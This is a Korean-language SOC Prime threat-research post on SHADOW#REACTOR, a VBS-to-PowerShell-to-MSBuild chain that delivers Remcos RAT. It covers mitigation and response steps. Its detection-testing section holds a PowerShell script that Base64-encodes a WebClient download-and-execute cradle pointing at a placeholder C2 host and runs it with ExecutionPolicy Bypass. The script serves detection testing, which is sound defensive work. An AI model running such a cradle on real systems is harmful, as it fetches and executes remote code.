SOC Prime Bias: 중간

15 Jan 2026 15:51 UTC

SHADOW#REACTOR – 텍스트 전용 스테이징, .NET 리액터, 인메모리 REMCOS RAT 배포

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon 팔로우
SHADOW#REACTOR – 텍스트 전용 스테이징, .NET 리액터, 인메모리 REMCOS RAT 배포
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

SHADOW#REACTOR는 악명 높은 원격 액세스 트로이 목마(RAT)인 Remcos를 배포하기 위해 난독화된 VBS 런처, PowerShell 기반 다운로더, 텍스트 전용 사전 단계 아티팩트, .NET Reactor로 보호된 로더 및 MSBuild 실행을 결합한 다단계 Windows 악성코드 체인입니다.

조사

연구자들은 공격자의 인프라에서 회수한 VBS 스크립트에서 시작하여 조립 및 디코딩이 진행되는 PowerShell 루틴을 통해 텍스트 페이로드를 추적하여 흐름을 재구성했습니다. 체인은 .NET 어셈블리를 반사적으로 메모리에 로드하고 Remcos RAT 실행을 트리거하는 MSBuild에 최종 단계 전달로 이어집니다. 이 문서에는 텍스트로 인코딩된 구성 요소, 복호화 로직 및 접근을 유지하기 위한 지속성 방법이 문서화되어 있습니다.

완화

스크립트 호스트 및 인터프리터에 대한 모니터링 범위를 확대하고, 가능하면 사용자 쓰기 경로에서의 VBS/PowerShell 실행을 방지하십시오. 식별된 인프라에 대한 의심스러운 아웃바운드 HTTP 트래픽, MSBuild 오용 및 반사적인 .NET 어셈블리 로딩에 대한 탐지를 추가하십시오. Run-key 수정 및 바로 가기 기반 시작 항목을 포함하여 일반적인 지속성 패턴을 모니터링하십시오.

대응

SHADOW#REACTOR 활동이 확인되면 엔드포인트를 격리하고 전체 프로세스 체인(wscript.exe → powershell.exe → msbuild.exe)을 중지하십시오. 로드된 텍스트 파일 및 관련 레지스트리 아티팩트를 제거하고, Remcos 바이너리 및 연관된 구성 블롭을 삭제하여 복구하십시오. 추가 손상을 파악하고 완전한 제거를 보장하기 위해 철저한 포렌식 검토를 따르십시오.

공격 흐름

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준 사전 점검이 통과되어야 합니다.

근거: 이 섹션에서는 탐지 규칙을 트리거하도록 설계된 적수 기술(TTP)의 정확한 실행을 세부적으로 설명합니다. 명령어 및 내러티브는 식별된 TTP를 직접 반영하며 탐지 논리에서 예상하는 정확한 텔레메트리를 생성해야 합니다.

  • 공격 이야기 및 명령어:
    제한된 측면 이동 권한을 가진 공격자는 일반적인 스크립트 차단 방어를 회피하면서 손상된 Windows 호스트에서 원격 페이로드를 실행하고자 합니다. 그들은 PowerShell을 사용합니다 -ExecutionPolicy Bypass 실행 정책 제약을 무시하기 위해. 악성 페이로드는 Base64로 인코딩된 문자열로 난독화되며, 이를 디코딩하면 System.Net.WebClient 객체가 생성되어 C2 서버에서 PowerShell 스크립트를 다운로드하고 호출합니다. 이 조합은 세 가지 탐지 기준 (ExecutionPolicy Bypass, FromBase64String, System.Net.WebClient).

  • 회귀 테스트 스크립트:

    #--------------------------------------------
    # 시뮬레이션된 악성 PowerShell 실행
    #--------------------------------------------
    # 1. 간단한 원격 스크립트 생성(데모 전용)
    $remoteScript = 'Invoke-Expression (New-Object System.Net.WebClient).DownloadString("http://{C2_HOST}/payload.ps1")'
    # 2. 스크립트를 Base64로 인코딩
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($remoteScript)
    $b64   = [Convert]::ToBase64String($bytes)
    # 3. ExecutionPolicy Bypass 및 FromBase64String으로 실행
    PowerShell -ExecutionPolicy Bypass -Command "
        $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('$b64'));
        Invoke-Expression $decoded
    "
  • 정리 명령어:

    # 다운로드된 모든 페이로드를 제거하고 남아 있는 PowerShell 프로세스를 중지하십시오
    Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'ExecutionPolicy Bypass'} | Stop-Process -Force
    Remove-Item -Path "C:Temppayload.ps1" -ErrorAction SilentlyContinue